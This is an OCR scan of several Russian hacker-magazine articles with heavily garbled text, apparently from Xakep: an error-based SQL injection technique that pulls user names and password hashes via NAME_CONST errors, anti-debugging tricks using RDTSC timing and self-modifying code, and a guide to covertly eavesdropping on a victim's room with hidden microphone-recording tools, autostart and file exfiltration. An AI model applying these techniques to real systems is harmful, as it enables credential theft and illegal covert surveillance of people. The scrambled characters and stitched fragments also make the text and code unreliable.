мы видим строку 'І8с180с1еі69с1с3ее86с5381 21 9е4с5с80 
', которая является паролем первого пользователя из 
таблицы 'изегз'. 



► обо 
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Шеп ап аЬЬаскег ехесикез 3<2Ь Іп^есСіоп аЬЬаскз 
зошекішез Ьке зегѵег ге зропсіз ЫЬЬ. еггог шеззадез 
г с| 

ГГѲ' 

ЗОІІ 
іЬЬе| 

■П д< 

5ГІС 
Тк 



>п а 




^адуЗЙ^^Мб^Е^ПОНЯТЬ, КАКОЕ ИМЕННО 
те ПОЛВНАМНУЖНО 



] КЧП. I II] *ѢШ т*т I 

*4 44*№> ч*чл«* № ВД< ^ЧС I" ЧИЧЙ 
1 **■-' ^*1»*ИІІ**П п 



к. !*Ч%ТІ1 , іП-Ч--?;'і*іНІДІ "ЯѴ ь '■>■! 



Ѵф 



РЧ*» им-і ь т тл г. Ѵ 4 7Л.к. 'ПАі-ма* 4. « ...... Вмгн .і| 

*.ч ШщщршшШ пкпащпіИиз .г-^іяпаг ят:гщ 
іда-ячии іі*дппп'Чі'М'#р«н->^т^чдіѵііѵи-іН’*.Еі| 



-*ІЧ і ІІ И-|С«Н I * ^1 г !!«■[.• І-- ССЛ» 



1 Ь# ЕРйІ рачі Н I г- ь Ні яі + М і 



МАЛОИЗВЕСТНАЯ НКЦИЯ 
ЫАМЕ СОЫ5Т0 




ПОЛУЧЕНИЕ ХЕША ПАРОЛЯ В КАЧЕСТВЕ ИМЕНИ СТОЛБЦА 



ЕЕЕОЕ 1060 (42821) : БирІісаЬе соіишп паше ' І:8с180с1е:1:69с1с3 
ее8бс5381219е4с5с80 ' 

Вот мы и добились, чего хотели. Теперь мы знаем, какдостать из базы 
данных любое поле за один запрос! Попробуем вытащить больше чем 
одно поле при помощи функции СОІЧСАТО, назначение которой объеди- 
нять две и более строк. Например: 



ИСПОЛЬЗОВАНИЕ НОВОГО МЕТОДА 
НА ДЕЙСТВИТЕЛЬНО СУЩЕСТВУЮЩЕМ 
ѴѴЕВ-ПРИЛОЖЕНИИ 



тузд1> ЗЕЬЕСТ * ЕЮМ (ЗЕЬЕСТ * ЕБЮМ (ЗЕЬЕСТ ЫАМЕ_ 

ССЖЗТ ( (ЗЕЬЕСТ сопсаЬ (пате , 0x3а , раззѵЫ) ЕЕОМ изегз 
ЫМІТ 1) , 1 ) х) а БОШ (ЗЕЬЕСТ ЫАМЕ_СШ5Т ( (ЗЕЬЕСТ 
сопсаЬ (пате, 0х3а,раззжі) ЕЕОМ изегз ЫМІТ 1),1)к)е)г; 
ЕЕЕОЕ 1060 (42821) : ЬирІісаЬе соіишп пате ' асітіп : 18(3.8 0<1е 
Е69с1с3ее86с5381219е4с5с80 ' 



Атеперь используем этотзапрос в методе получения имен полей, без 
использования ІЫР0РМАТІ0М_5СНЕМА. Аккуратненько составляем 
запрос, подставив вызов функции ЫАМЕ_С0Ы5Т вместо именитаблицы, 
в которой узнаем имена столбцов. Незабываем добавлять алиасы к 
каждой используемой таблице и стараемся не запутаться в скобочках. 
Запускаем: 

тузд1> ЗЕЬЕСТ * ЕЕОМ (ЗЕЬЕСТ * ЕЕОМ (ЗЕЬЕСТ ЫАМЕ_ 

ССЖЗТ ( (ЗЕЬЕСТ раззжі ЕЕОМ изегз ЫМІТ 1) ,1)х)а СОШ 
(ЗЕЬЕСТ ЫАМЕ_ССЖЗТ( (ЗЕЬЕСТ раззотй ЕЕОМ изегз ЫМІТ 1) ,1) 
к ) е ) г ; 



Такмы и получили два поля за один запрос. Ксожалению, бесконечно 
увеличивать количество выводимых полей невозможно, так как вывести 
более 64 символов не получится. Но эта проблема решаема, если ис- 
пользовать функцию 51ІВ5ТРІЫѲ0, описание к которой ты без проблем 
найдешь в официальной документации. 

ЗАКЛЮЧЕНИЕ 

Далеко не все методики работы суязвимостями исследованы до конца, ва- 
риантов упростить свою работу множество. Поэтому советую всем хакерам 
отвлекаться оттривиального взлома и уделять время новым исследовани- 
ям. Ведьхакер это, в первую очередь, исследователь, нетакли? т 



Совет №3. Спи с открытым окном! 

Пока ещё не настала зима, и на улице не так холодно, как будет в дека- 
бре, открытое окно не доставит тебе дискомфорта, зато доставит 
в твой организм больше полезного кислорода. Утром проснёшься 
свежим и бодрым. Конечно, злоупотреблять не следует, но в разумных 
пределах это очень полезно! 
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I ЛЕОНИД «СКаМДЕК» ИСУПОВ /СКАИ1ЕК®ХДКЕР.Ки/ 



«ДЕБРИ» КОДА, В КОТОРЫЕ УХОДИТ 
ЗАЩИЩЕННАЯ ПРОГРАММА, 
ВЫПОЛНЯЕМАЯ ПОД ОТЛАДЧИКОМ 



АНТИОТЛАДОЧНЫЕ 

ТРЮКИ 



Активно противодействуем отладке нашего приложения 



В Сети можно найти огромное количество статей, посвященных ре- 
версингу. Правда, большинство направлены на изучение методов 
снятия конкретных пакеров и протекторов. В то же время трудно най- 
ти хорошее руководство по антиотладке, которое бы описывало мето- 
ды, применимые во многих случаях. 



ВАШЕ ВРЕМЯ ВЫШЛО! 

Факт выполнения кода под отладчиком скрыть 
достаточно сложно, это в особенности отно- 
сится ко времени выполнения инструкций. 
Действительно, каждая инструкция выполня- 
ется процессором за определенное количество 
тактов. Зная тактовую частоту процессора, 
легко вычислить временной промежуток, 
необходимый для выполнения того или иного 
объема вычислений. Даже если невозможно 
определить, какой процессор воткнут в разъем 
материнской платы, можно рассчитать диа- 



пазон, в который теоретически укладывается 
скорость интерпретации машинных инструк- 
ций. Можно вводить поправкуина разницу в 
частотах, и на количество ядер процессора, и 
натехнологии оптимизации выполнения кода, 
используемые втех или иных процессорах. 

Но и это не столь важно, если рассматривать 
достаточно распространенное оборудование, 
например, процессоры I пііеі и АМО. Значит, 
можно использоватьантиотладочные приемы, 
построенные на принципе за мера времени 
исполнения некоторых инструкций. 



Работая над антиотладочным кодом, мы 
можем пойти по одному из следующих 
путей: 

1. Замер времени выполнения инструкции, 
сравнение полученного времени со значением, 
которое укладывается в принятые рамки, но 
имеет«запас». 

2 . Точный замер времени выполнения ряда 
инструкций, например, очень большого цикла. 
Какпервый.таки второй способы имеютсвои 
преимущества. 

Процессор оперирует понятием такта, который 
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В ПРИНЦИПЕ, ВЫХОД ЕСТЬ. ОБНУЛЕНИЕ 
СЧЕТЧИКА ИЛИ ЗАМЕНА ИНСТРУКЦИИ НА 
«ЫОР» ДАДУТ РЕЗУЛЬТАТ, НО ИСПОЛЬЗОВАНИЕ 
МОДИФИКАЦИЙ МЕТОДА ПОЗВОЛЯЕТ 
ИСКЛЮЧИТЬ И ЭТУ возможность 



КОД ВЫПОЛНЯЕТСЯ ПОД 0ІШѴЦВ6 ПО <Р7>. 
РЕЗУЛЬТАТ — ВОЗНИКНОВЕНИЕ ИСКЛЮЧЕНИЯ 



в некотором смысле является аналогом 
временного промежутка. Если каким-либо 
образом получить количество тактов, которое 
процессор выполнил с момента последнего 
сброса счетчика тактов, становится возмож- 
ным использоватьэтозначение, чтобы опре- 
делить, выполняется ли поток машинного кода 
с положенной скоростью, или же программа 
запущена под отладчиком. Такая возможность 
существует, инструкция «гейвс» предоставляет 
программисту средства для подсчета коли- 
чества тактов, выполненных процессором с 
момента последнего сброса. Вот какописыва- 
ет эту инструкцию «Википедия»: 

«гббзс (Кеаб Тіше ЗЬатр Соипбег) — 
ассемблерная инструкция для плат- 
формы х86, читающая счетчик ТЗС 
(Тіше Збашр СошіЬег) и возвращающая 
в регистрах ЕБХ : ЕАХ 64-битное коли- 
чество тактов с момента последнего 
сброса процессора, гббзс поддержи- 
вается в процессорах РепЬіит и более 
новых. Опкод: ОЕ 31. В многозадачных 
операционных системах инструкция 
может быть превращена в привилегиро- 
ванную (установлен 3 бит в управляю- 
щем регистре СК4) , и ее использова- 
ние приведет к генерации исключения 
в программе» . 

Для того чтобы использовать инструкцию 
В0Т5С в антиотладочных целях, необходимо 
выполнить ее дважды: до и после выполне- 
ния кода, для которого будет производиться 
замер: 



АББКЕЗЗ: КБТЗС 

АББКЕ83_2 : выполняемый код 

АББКЕ38_3 : КБТЗС 

Естественно, код, для которого производится 
замер, можетбыть и не специально написан- 
ным набором инструкций, а какой-либо частью 
программы. Младшая часть 64-битной после- 
довательности, содержащей количество так- 
тов, помещается в регистр ЕАХ. В большинстве 
случаев (для незначительного количества 
инструкций] изменен будет именно он, стар- 
шая же часть последовательности — регистр 
ЕОХ — останется неизменной. Значит, если 
выполнить два замера количества тактов — до 
и после выполнения проверочного кода — и 
получить разностьзначений, которыми были 
инициализированы регистры ЕАХ, полученное 
значение будет количеством тактов, которое 
процессор выполнил между замерами. Если 
предположить, что одна инструкция не может 
выполняться процессором за время, когда 
счетчик«наматывает» более 0x1 000 тактов, 
можно реализовать антиотладочный прием 
следующим образом: 

КБТЗС 

ХСНС ЕАХ, ЕСХ 
КБТЗС 

ЗБВ ЕАХ, ЕСХ 
СМР ЕАХ, 1000 
БВЕ ШТ_БЕВШСЕВ 
САЬЬ Кегпе132 . ТегтіпаЕеРгосезз 



Ж)Т_ВЕВБССЕВ : выполнение программы 



Инструкция «ХСНО ЕАХ, ЕСХ» одновремен- 
но является и инструкцией, для которой 
замеряется «тактовый промежуток», и частью 
антиотладочного кода (производится сохра- 
нение содержимого регистра ЕАХ в регистр 
ЕСХ перед повторным получением количес- 
тва тактов]. После выполнения первых трех 
инструкций регистры ЕАХ и ЕСХ содержат 
значения, соответствующие количеству та кто в, 
выполненных процессором в разное время 
(на моменты до и после вызова инструкции 
«ХСНС»]. Далее вычисляется их разность и ее 
сравнение со значением 0x1000. Полученная 
разность превысила заданную величину? Нас 
отлаживают, завершаем работу. 

Попробуем использовать наш код в програм- 
ме, написанной на ассемблере. Ее исходный 
код вы глядит та К: 

.386 

.тобеі бІаЕ , зЕбсаІІ 
орбіоп сазетар топе 

; подключение необходимых библиотек: 
іпсіибе \тазпв 2 \ іпсіибе \тоіпбоѵ?з . іпс ; 
іпсіибе \тазт32 \іпс1ибе\кегпе132 . іпс ; 
іпсіибеііб \тазт32 \1іЬ\кегпе132 » ІіЬ ; 
іпсіибе \тазт32 \іпс1ибе\изег32 . іпс ; 
іпсіибеііѣ \тазт32 \1іЬ\изег32 . ІіЬ ; 

; секция данных 
. баба 

а1егЕ_иррег 6Ъ " Зітріу ргодгат" , О 
а1егЕ_ЬехЕ 6Ъ "Неііо, Иогіб! " ,0 
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; секция кода 
. сосіе 



зкагС : 

іпѵоке МеззадеВох, 
ШЬЬ, 

асМг а1егк_Ьехк , 
асісіг а1егк_иррег , 
МВ_ОК 



іпѵоке ЕхікРгосезз, ШЪЬ 
епсі зкагк 



Утебя есть несколько путей реализации анти- 
отладочного приема — можно внедрить нашу 
конструкцию непосредственно в исходный 
код, можно внести изменения в уже откомпи- 
лированный РЕ-файл. Я предпочитаю второй 
способ — он годится для защиты и тех про- 
грамм, исходным кодом которых мы не рас- 
полагаем. Значит, откомпилируем программу 
при помощи МА5М (« т I /с /собб /С р имя_фай- 
ла.азт»; «Ипк /5ЦІ В5У5ТЕМ :ѴѴІ N РОѴѴЗ / 
иВРАТН:с:\та5т32\ІіЬ/5ЕСТІ0М:ЛехЕРѴѴЕ 
имя_файла.оЬ]»]. И модифицируем ее любым 
отладчиком, например, ОІІуОВѲ. Для «подо- 
пытной», исходный код которой был рассмот- 
рен выше, набор антиотладочных инструкций, 
базирующийся по адресу 0x401026, будет 
выглядетьтак: 



00401026 

00401028 

00401029 

0040102В 

0040102Б 

00401032 



КБТЗС 

ХСНС ЕАХ , ЕСХ 
КБТЗС 

ЗЮВ ЕАХ, ЕСХ 
СМР ЕАХ ,500 

ЦВЕ ЗНОКТ ех_Сіскс .00401000 



; переход к точке входа программы 



Программиста не интересуют последствия 
выполнения кода, следующего после адреса 



0x401032, хотя можно разместить ниже услов- 
ного перехода инструкцию завершения работы 
программы. Результат обнадеживает: отладчик 
ОИуРВб не справился с выполнением кода :). 

ЖЕЛЕЗНАЯ АНТИОТЛАДКА 

Особенности выполнения некоторых инструк- 
ций процессорами позволяет создавать антиот- 
ладочные методы, обойти которые способен не 
каждый реверсер. Это связано с особенностями 
архитектуры процессоров, которые не учиты- 
вают отладчики. В качестве примера можно 
привести особенности очереди предваритель- 
ной выборки процессоров I пііеі. Сайт ѵѵѵѵѵѵ.іпіеі. 
сот комментирует понятие «предварительная 
выборка»: 

«Исходя из содержания текущей ко- 
манды или поставленной задачи, блок 
предварительной выборки определя- 
ет порядок запроса соответствующих 
данных и инструкций из командной кэш- 
памяти или системной памяти компью- 
тера . По мере поступления инструкций 
важнейшей задачей блока предвари- 
тельной выборки становится их пра- 
вильное «выстраивание» и пересылка в 
блок декодировки» . 

Один из способов антиотладки, использующей 
механизм очереди предварительной выборки, 
— перезапись исполняемого кода. Рассмотрим 
псевдокод: 

АББКЕЗЗ_01: САЬЬ АББКЕЗЗ_03 
АББЕ.ЕЗЗ_02 : инструкции, подлежащие 
исполнению 

АББКЕЗЗ_03: МОѴАЬ, ОСЗЬ 
МОѴЕБІ, ОЕЕЗЕТ АББКЕЗЗ_03 
ОК ЕСХ, ЕЕЕЕЕЕЕЕ 
КЕР ЗТОЗВ 



ВЫПОЛНЕНИЕ ЭТОГО КОДА ПОД ОТЛАДЧИКОМ ПРИВЕДЕТ К КРАХУ 
ПРОГРАММЫ! 




Исполнение этого набора инструкций приведет 
к различным результатам, в зависимости от 
того, как код был выполнен (под отладчиком или 
штатно], какие атрибуты имеет страница памя- 
ти, следующая за страницей, содержащей код. 
Если атрибут «ѵѵгкеаЫе» секции не установлен, 
исполнение кода приведетквозникновению 
исключения, что неизбежно повлечет крах 
программы. Поэтому для его использования 
необходимо предусмотреть установку необхо- 
димых атрибутов на страницы памяти. 

Итак, какуже было сказано, результат выпол- 
нения кода зависит от нескольких факторов. 
Функция данного кода, несложно догадаться 
— перезапись инструкций поверхуже существу- 
ющих. Значит, поверх инструкции «ПЕР ЗТОЗВ» 
должен записаться код, соответствующий шест- 
надцатеричному значению ОхСЗ. Естественно 
предположить, что выполнение кода должно 
остановиться сразу после того, как инструкция 
РЕР ЗТОЗВ будет перезаписана. Действитель- 
но, такое «поведение» процессора, выполняю- 
щего машинный код, кажется логичным — ведь 
на месте ранее выполнявшегося кода находит- 
ся новый (машинный код ОхСЗ соответствует 
инструкции ПЕТ]. В случае если код выполнялся 
в контексте отладчика, все будет происхо- 
дить именнотаким образом — выполнение 
остановится, инструкция РЕТ выполнится, 
возвращая управление потому адресу, который 
был сохранен в стек. Если отладчик в памяти 
отсутствует, а процесс исполняется в контексте 
операционной системы без посредничества от- 
ладчика, произойдет исключение, тип которого 
может варьироваться в зависимости отспособа 
размещения памяти, которая находится сразу 
после рассматриваемого кода. 

В случае если память является обычной 
виртуальной областью, будетсгенерировано 
исключение «Ошибка доступа к памяти» (Ассезз 
ѵіоіабоп]. Программа будетзавершена, однако 
если обработчик исключений установлен, 
ошибка может быть обработана. В случае если 
обращения квиртуальной памяти не произош- 
ло, выполнение инструкции гер будет прекра- 
щено. Произойдет следующая последователь- 
ность событий: запись инструкции «ПЕТ» (ей 
соответствует размещенный в части регистра 
АХ байт-код], ее выполнение и, соответственно, 
возврат к АООПЕ55_02 (в стеке размещен адрес 
инструкции, следующей за ВЕР]. 

Объяснение этому — особенность механизма 
предварительной выборки. Процессоры I піеі 
младше Репбит при записи в адрес памя- 
ти, соответствующий адресу в очереди, не 
очищали очередь предварительной выборки 
автоматически. Очередь очищалась л ишь тог- 
да, когда вызывалось исключение (ехсербоп]. 
Например, в случае с пошаговым исключением, 
которое используется отладчиками приклад- 
ного уровня, очередьавтоматически очища- 
лась. Таким образом, на процессорах данного 
типа, в отсутствии отладчика, выполнялась 
бы оригинальная машинная инструкция. 

Если же отладчик присутствует, очередь будет 
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ИЗМЕНЯЕМ ТОЧКУ ВХОДА 
ПРОГРАММЫ 



очищаться; соответственно, выполняться будет 
не оригинальная инструкция, а машинный код, 
которым она была перезаписана. 

Эта особенность была изменена в процес- 
сорах Репбит и старше. Несмотря на это, 
команды М0Ѵ5 и 5Т05 с префиксом ПЕР 
продолжают кэшироваться. Следовательно, 
они выполняются даже в том случае, когда 
произошла их перезапись. В нашем случае 
процессор выполняет очистку очереди пред- 
варительной выборки и выполняет операцию 




«БРАТ-БЛИЗНЕЦ» 0Ц-ѴБВ6 — 
«ПИТОНОВЫЙ» ІММУШТѴ 



Итак, вот как действует операционная сис- 
тема, выполняя набор инструкций: 

1. Помещение в стекадреса 00401000. 

2 . Вызов кода, размещенного по адресу 
00401035, и, соответственно, помещение в стек 
адреса 00401030. Это естественно, так как в мо- 
мент вызова автоматически сохраняется адрес 
инструкции, следующей за командой «саіі», 



ЕСТЕСТВЕННО ПРЕДПОЛОЖИТЬ, ЧТО ВЫ- 
ПОЛНЕНИЕ КОДА ДОЛЖНО ОСТАНОВИТЬ- 
СЯ СРАЗУ ПОСЛЕ ТОГО, КАКИНСТРУКЦИЯ 
КЕР5Т05В БУДЕТ ПЕРЕЗАПИСАНА. 



«ПЕТ». Эту особенность можно использовать 
в антиотладочных целях. Код, написанный 
нами, будет дробить любые попытки пошаго- 
вой отладки приложения. 

Будем изучать действие кода на примере 
программы, рассмотренной выше. Перед 
внедрением защитного кода изменим 
точку входа программы на 0x401 026, где 
он и будет размещен (используй БогсІРЕ]. 
Откроем программу в ОІТуОЬд и дополним 
ее кодом : 



которая инициировала вызов. 

3. Инициализация инструкции цикла «ПЕР 
5Т05» — в регистры будут помещены необходи- 
мыеданные. 

4 . Выполнение инструкции «ПЕР5Т05» до пол- 
ной отработки цикла (обнуление ЕСХ]. 

5 . Выполнение инструкции «ПЕТ». Инструкция 
ПЕР5Т05ѴѴ0П0 РТП ЕЗ:[Е01], расположенная 
по адресу 0x401 030, выполнена не будет, та к как 
регистр-счетчик ЕСХ будет содержать нулевое 
значение. 



6 . Выполнение возврата по адресу 0x401 000, 
помещенному в стекранее. 

Естественно, все выполнится без заминок. 

А вот что произойдет, если программу будет 
отлаживать реверсер: 

1. Помещение в стекадреса 0040100. 

2 . Вызов кода, размещенного по адресу 
00401035, и, соответственно, помещение в стек 
адреса 00401030. 

3. Инициализация инструкции цикла «ПЕР 
ЗТ05» — в регистры будут помещены необходи- 
мые данные. 

4. Выполнение инструкции «НЕР5Т05»до 
момента перезаписи кода — очередь предвари- 
тельной выборки будеточищена. 

5 . Выполнение инструкции «ПЕТ». Инструкция 
НЕР5Т05ѴѴ0Н0 РТП ЕЗТЕБІ], расположенная 
по адресу 0x401 030, выполнится, так как ре- 
гистр-счетчик ЕСХ будет содержать значение, 
отличное от нулевого. 

6 . Послетого, как ЕБІ достигнетзначения 
0x402000, произойдетисключение — ошибка 
записи в память («Асееве ѵіоіабоп ѵѵбеп ѵѵгібпд 
Іо...»]. 

Программа уйдет в штопор, что вряд ли обраду- 
ет крякера :]. Почему выполнение инструкции 
НЕР5Т05ѴѴ0Н0 РТП Е5:[Е0І] (говоря проще, 
«ПЕР5Т05ѴѴ») при ненулевом значении ЕСХ 
приводит к краху? Чтобы понять это, разберем 
механизм действия команды «5Т05». «ЗТОге 
ЗЕгіпд» — команда, которая помещает по адресу, 
указанному в регистре ЕБІ, байт, слово или 
двойное слово (для его указания используется 
регистр ЕАХ или его части] и автоматически 
корректируетзначение адресного регистра 
ЕБІ. Команда «5Т05В» использует в качестве 
операнда значение регистра АЕ, а инструкция 
«5Т05ѴѴ» — регистра АХ. 

Значит, при выполнении инструкции ПЕР 
5Т05ѴѴ будетзадействован регистр АХ. 
Следовательно, адресный регистр (ЕБІ) будет 
корректироваться не на 1 байт, а на 2, что при- 
ведет к достижению им критического значения 
0x402000. Выполнение программы станет 
невозможно.^ 



00401026 РИЗЫ 00401000 

0040102В САЫі 00401035 

00401030 ВЕР ЗТОЗ ШЕШ РТР ЕЗ : [ЕБІ] 

00401033 ЫОР 

00401034 ЫОР 

00401035 МОѴ АЬ , ОСЗ 

00401037 МОѴЕБІ, 00401035 

0040103С МОѴ ЕСХ, 0ЕСА 

00401041 РЕР ЗТОЗ ВУТЕ РТВ ЕЗ : [ЕБІ] 

Что произойдет, если программа, изме- 
ненная подобным образом, выполнится 
обычным способом (вне отладчика]? Анти - 
отладочный код работоспособен, так как 
вновь записанная инструкция ПЕТ, ведущая 
к НЕР5Т05ѴѴ0Н0 РТП Е5:[Е0І], выполнится 
только после обнуления регистра ЕСХ, ведь 
очередь предварительной выборки не будет 
очищена. 



«СОБИРАЕМ» ФАЙЛ ПРОГРАММЫ ПРИ ПОМОЩИ МА5М32 



• К'. I МХІ « і ■> учі НШ2 ■ [. п ' 



-ІВІхІ 



ПістзоП: <Н> ПйСк'Сі ДзяспЫог 0с га іо п 6.14.8^1 

('пфугЦІіІ. (С) М: с га !;□?!. Согр 19Й1 -Й87. Й 1 1 гіуіьЕі; гсегѵеА. 

ЙззепЫіпд- е*.анп 

С : Чпл&и32^іп > І іп Ь ^5иВ5Ѵ5ТЕП:М] N0005 Л,1ВРЙІН;с:Чм»нЭ2\Ш /5ЕШ (№П . ШскЕ . ПНЕ 
ек.оЬі 

НісгазйГі СЙ) 1 нсЕ'ЕіпеііІ.лІ ІЗпкеЕ’ Иср$Ірпі 5. І2.ЙЙ7Я 
Соругідіі* <С) Лісгосо^ Оргр 1992-199Й, ЙІ1 гідЬСз гесегѵе0 т 
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взлом 



■ ■ ЛЕОНИД «РОЮ» ОТРОЙКОВ / Кот^МАП.КЫ / 





Звуковой эффект Микшер Звуковые входы/выходы Микрофон 



ВЫ ГОВОРИТЕ — 

МЫ СЛУШАЕМ 

Чтобы ты понял смысл происходящего, я 
начну с теории. В основе любого удаленного 
прослушивания лежит два основных момента: 

1. Запись 

2 . Передача записанного 

Какты понимаешь, любой компьютеропо- 
добный девайс, в том числе и ноут/КПК/ 
нетбук/еіс, способен соответствовать 
обоим пунктам, но при выполнении ряда 
условий : 

► 066 



1 . Наличие устройства звукозаписи 
2 . Наличие устройства передачи 
данных 

В первом случае идеально подойдет микро- 
фон, который по дефолту входит в конфигура- 
цию большинства мобильныхустройств, а во 
втором — ЗВ/Е йСЕ-модем, либо ѴѴі-Еі- модуль. 
Я думаю, ты уже понял, к чему я клоню — для 
прослушки помещения требуется лишь комп 
(ноутбук) с подключенным к нему микрофоном 
и модемом. Согласись, подобные требова- 
ния далеко не экзотичны, и основная масса 
девайсов будет им соответствовать. А значит 



— мы сможем услышатьто, что нам совсем не 
предназначалось :). 

Справедливости ради отмечу, что идея не 
нова и обладает рядом недостатков. Во-пер- 
вых, качество звука напрямую зависит от 
звукозаписывающего устройства: ожидать от 
среднестатистического китайского микро- 
фона чувствительности в радиусе десятка 
метров не стоит. Во-вторых, нам потребуется 
софт, способный скрытно работать в системе, 
вести звукозапись и отсылать записанное 
нам. И, наконец, все это чертовски противо- 
законно, поэтому советую рассмотреть идею 
лишь втеории. Впрочем... если закрыть на 
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Воспроизвепени 



КеаІІек НО Аисііо оиіриі 

Синтезатор зрный проигрыва Микрофон 

і ~ А <• і Д ж і і Ж і 



Отключить 



ОТКЛЮЧАЕМ НЕИСПОЛЬЗУЕМЫЙ МИКРОФОН 









ТРОЯНСКИЙ 
МИКРОФОН 

Подслушиваем обстановку вокруг компьютера 

Ты любишь общаться в скайпе или других голосовых клиентах? А мо- 
жетбыть, втвоем ноуте или компе микрофон входитв стандартную 
конфигурацию? Казалось бы, что в этом плохого? На первый взгляд - 
ничего, но, поверьмне — тебя слушают, брат. Давно слушают! 




“ С:ШІМ00^5^етЭг\стс1, 



дАЛхсгокоГт: I 'хгш. оиз «Р [Версия 5. 1.^6 ОНО] 

^ш<С> Корпорация Пайк рос офт, 1985-2001. 

р:\ВоеипепСз апсі 8е1:еіпз5\і*оо1:>С:ЧМіс8ру.ехе 
заде: Иіе$р^+ + .е>се С:\пісзру++\ 600000 16 

ѴЛшге : 



МІС5РѴ++ ОТ ІЧІ6НТМАКЕ В ДЕЙСТВИИ 




і*е«1 N оп епй! 
- ЗѲ піпиЪез 



I 

НЕ СПАСАЕТ ПОЛОЖЕНИЕ ДАЖЕ ВЫПОЛНЕНИЕ ПРОГРАММЫ ПО <Р9> 



Кроме того, при написании полноценного ав- 
томатизированного софта, следует учитывать 
ряд важных моментов. А именно: 

• Автоматический запуск при загруз- 
ке ОС 

• Скрытая работа в системе 

Дабы не сбиться с намеченного курса, сразу 
перейдем к первому пункту — осуществле- 
нию скрытой звукозаписи. Если кодингом ты 
занимаешься не первый день, то набросать 
подобную утилу тебе не составит особого 
труда. В противном случае — можно запросто 
заюзатьуже готовый софт, не изобретая при 
этом велосипед :). Специализированныхутил 
подобного рода мне встречалось лишь две — 
МісЗру от 5ЕЕ5Н'а и Міс5ру++ от ЫідЫ:таге. 
Несмотря на схожесть в названиях, отличия 
в функционале присутствуют, поэтому мы 
подробно ознакомимся с каждой из софтин. 
Начнем по порядку, то есть с МісЗру. 

• Утила написана на делфи 

• Размер упакованного ехе'шника — 

около 8 Кб 

• Записывает звук в формате трЗ 

• Сжатие — 24 КГц 



все эти пункты глаза, то реализовать задуман- 
ное не так сложно, как кажется : 

РЕАЛИЗАЦИЯ ИДЕИ, ИЛИ 
ПРОСЛУШКА В ДЕЙСТВИИ 

С теоретической частью разобрались, наста- 
ло время перейти к практике. Начнем мы, как 
водится, с краткого плана действий. Итак, нам 
потребуется: 

1 . Производить звукозапись в фоно- 
вом режиме с использованием уста- 
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УТИЛ ПОДОБНОГО РОДА МНЕ ВСТРЕЧАЛОСЬ 
ЛИШЬ ДВЕ — МІС5РУ ОТ 5І_Е5Н'А И МІС5РУ++ 
ОТИІОНТМАРЕ. 



новленных в системе звукозаписываю- 
щих устройств (если такие имеются) 

2 . Сохранять аудиозаписи 
3. Получать аудиозаписи (например, 
через свой Г Др- сервер) 



• Битрейт — 32 Кбит/сек 

• Использует дефолтовый виндовый 
кодек МРЕС ЬАУЕК-3 

• Генерирует имена файлов по маске : 
год_месяц_день_час -минуты- секунды 



► 067 








взлом 



Свойства: Звуки и аудиоустройства 



гаіи 



Г ромкость 
Аудио 



Звуки 



Речь 



Оборудование 



Можно изменить громкость и другие параметры для 
выбранных вами устройств воспроизведения и записи речи. 



Воспроизведение речи 

(ЯЛ Используемое по умолчанию устройство: 
ПеаІІек НО Аибіо оифиі 



Громкость.. 



Дополнительно.. 



Запись речи 

Используемое по умолчанию устройство: 

К 




ВеаІІек НО Аибіо Іприі 



Громкость... Дополнительно... 



Проверка... 



ОК 



Отмена Применить 



МИКРОФОН В СИСТЕМЕ — ОДНА ИЗ СКРЫТЫХУГРОЗ 



• Есть возможность управления ути- 
лой через меЪ-интерфейс 

• Скрытая работа в системе 

Какты уже понял, основной особенностью 
утилы является возможность рулить всем 
через ѵѵеЬ-админку. Это позволяет: 

• Начинать/останавливать запись 

• Отображать список всех записанных 
файлов 

• Удалять записи, выборочно 

• Скачивать записи, выборочно 

Админка запускается автоматически, 
затем коннектиться следует на порт 4545, 
(например, ЫТрУ/І 27.0.0. 1 : 4545]. При ис- 
пользовании утилы отпадает надобность 
писать дополнительную программную 
часть для передачи записанных файлов, 
ибо админка прекрасно справляется с 



этой задачей. Однако не стоит забывать, 
что за юзать ѵѵеЬ- интерфейс получится 
лишь в случае, если у жертвы есть стати- 
ческий выделенный ІР. Увы, но большинс- 
тво мобильных девайсов сЗО/ЕООЕ-мо- 
демами и ѴѴі-Еі-карточками, скорее всего, 
останутся не у дел. Теперь рассмотрим 
утилу Міс5ру++. Из интересующих нас 
особенностей можно выделить: 

• Совместимость с Жпбомз Ж 1 (2000/ 
ХР) 

• Использование стандартных кодеков 
и формата ѵлпа в Жпбомз Ж 

• Сжатие — 32 КГц по дефолту; воз- 
можно изменение значения по своему 
усмотрению 

• Ограничение записи в файл по 
временному промежутку ( 3 0 минут по 
дефолту) 

• Скрытая работа в системе 



Словом, Міс5ру++ представляет собой функ- 
циональную утилу с одним недостатком — от- 
сутствие возможности передачи записанных 
файлов. 

Таким образом, обеутилы подходят для реше- 
ния задач из первого и второго пункта нашего 
плана, а именно — скрытая звукозапись и 
сохранение аудиофайлов. Кроме того, в ряде 
случаев прога МісЭру способна выполнить и 
третий пункт — передачу записанных файлов, 
но по ЫТр-протоколу и с известными ограни- 
чениями (необходим статический выделен- 
ный ІР-адресжертвы). 

Переходим к рассмотрению вариантов по- 
лучения аудиофайлов (собственно, без этого 
действия все вышеизложенное не имеет 
никакого смысла]. Сперва определим свое 
положение относительно атакуемого девайса 
(компа/ноута/нетбука/еіс). Ситуации может 
быть две: 

1 . Наличие физического либо удален- 
ного доступа 
2 . Отсутствие такового 

Первый случай наиболее простой, ибо при 
наличии физического либо удаленного 
доступа к машине отпадает необходимость 
в использовании дополнительного софта. 
Гораздо проще все сделать ручками по следу- 
ющему алгоритму: 

1 . Создание условий для автомати- 
ческого запуска утилы (здесь все 
зависит только от твоей фантазии: 
будь то помещение утилы в «Автоза- 
грузку» или внесение дополнительных 
значений в ключи реестра) 

2 . Установка звукозаписывающих 
устройств в системе (при удаленном 
доступе — включение, при физичес- 
ком — можно и микрофончик хороший 
прицепить, незаметно) 

3 . Сбор накопленных аудиофайлов 
(при помощи консоли или удаленного 
рабочего стола; либо сурово скопи- 
ровать все на флешку, если имеется 
физический доступ к девайсу) 

Как видишь, при наличии доступа катакуе- 
мому компу никаких лишних телодвижений 
оттебя не требуется. Но вот если доступа нет 
и получить его никак нельзя, — придется 
кодить дополнительную часть кзвукозаписы- 
вающей утиле, которая будет выполнять роль 
лоадера и сендера файлов. В этом случае есть 
два пути: первый — накодить полноценный 
лоадер с возможностью автозапуска, загрузки 
файлов, и т.п., а второй — использовать уже 
готовый лоадер (подойдет любой рабочий 
па блик релиз] и написать лишь небольшой 
передатчик файлов (например, на Йр-сервер]. 
Так или иначе, писать передатчик файлов на 
